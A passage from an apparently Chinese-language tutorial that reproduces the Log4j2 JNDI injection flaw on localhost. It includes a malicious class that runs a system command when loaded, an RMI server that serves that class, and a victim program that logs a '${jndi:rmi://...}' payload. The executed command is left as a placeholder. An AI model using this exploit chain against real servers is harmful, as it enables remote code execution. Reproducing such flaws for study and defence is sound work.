2. 攻击代码块(攻击方)org.projectlombok lombok 1.16.18 org.apache.logging.log4j log4j-slf4j-impl 2.14.0
commands执行的命令就不再展示了,可以自行DIY,此处能观察日志打印就算成功。
public class Sout {
static {
System.out.println("guess who am I ~~");
System.out.println("开始执行代码...");
String[] commands = {"open", "......"};
try {
Process process = Runtime.getRuntime().exec(commands);
process.waitFor();
} catch (Exception e) {
e.printStackTrace();
}
System.out.println("执行完成。");
}
}
3. JNDI服务端(攻击方) 注意import的包
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
public class Server {
public static void main(String[] args) {
try {
Registry registry = LocateRegistry.createRegistry(8888);
Reference reference = new Reference("com.xxx.jndi.demo2.Sout", "com.xxx.jndi.demo2.Sout", null);
registry.bind("Server", new ReferenceWrapper(reference));
System.out.println("RMI服务已启动...");
} catch (Exception e) {
e.printStackTrace();
}
}
}
4. 服务端(被攻击方) 此处模拟请求写死入参
import lombok.extern.log4j.Log4j2;
@Log4j2
public class Log4j2Test1 {
public static void main(String[] args) {
String ref = "${jndi:rmi://127.0.0.1:8888/Server}";
log.info("test: [{}]", ref);
}
}
5. 开始调用
(1).先启动攻击方的Server.main(),开启JNDI服务:
Server(攻击方JNDI服务)日志:
(2).再执行的Log4j2Test1.main();
Log4j2Test1(被攻击方服务)日志:
注意日志是在Log4j2Test1 — 被攻击方处打印的,表明注入成功。
而通过commands可以进行更多危险的操作。
